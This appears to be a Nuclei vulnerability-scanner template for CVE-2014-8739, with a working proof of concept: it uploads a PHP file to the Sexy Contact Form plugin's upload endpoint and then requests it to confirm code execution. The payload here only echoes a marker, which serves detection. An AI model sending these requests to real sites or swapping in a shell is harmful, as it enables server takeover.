Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
PoC代码[已公开]
id: CVE-2014-8739
info:
name: WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
author: melmathari
severity: critical
description: |
Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
impact: |
Attackers can execute arbitrary PHP code on the server, leading to full system compromise.
remediation: |
Update to the latest version of the plugin that fixes this issue or implement server-side validation to restrict file types.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8739
- https://www.exploit-db.com/exploits/35057
- https://www.exploit-db.com/exploits/36811
- http://www.openwall.com/lists/oss-security/2014/11/11/4
- http://www.openwall.com/lists/oss-security/2014/11/11/5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-8739
cwe-id: CWE-434
epss-score: 0.90252
epss-percentile: 0.99577
cpe: cpe:2.3:a:creative-solutions:creative_contact_form:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: creative-solutions
product: creative_contact_form
framework: wordpress
publicwww-query: "/wp-content/plugins/sexy-contact-form/"
tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce,vkev,vuln
flow: http(1) && http(2)
variables:
marker: "{{randstr}}"
fname: "{{rand_base(6)}}"
http:
- raw:
- |
POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files[]"; filename="{{fname}}.php"
Content-Type: application/octet-stream
<?php echo "{{marker}}"; ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "files","delete_url")'
- 'contains(content_type, "text/plain")'
condition: and
internal: true
- raw:
- |
GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/{{fname}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "{{marker}}"
# digest: 4a0a00473045022100c9ce7deb9c5ac2f5e6fa694d991e99ca93fe2e4df5d88d2c3f2b4c3b767fe7920220517319df84d03298ca191322f5a4af529dd03701fcf5f29a8113024865f46955:922c64590222798bb761d5b6d8e72950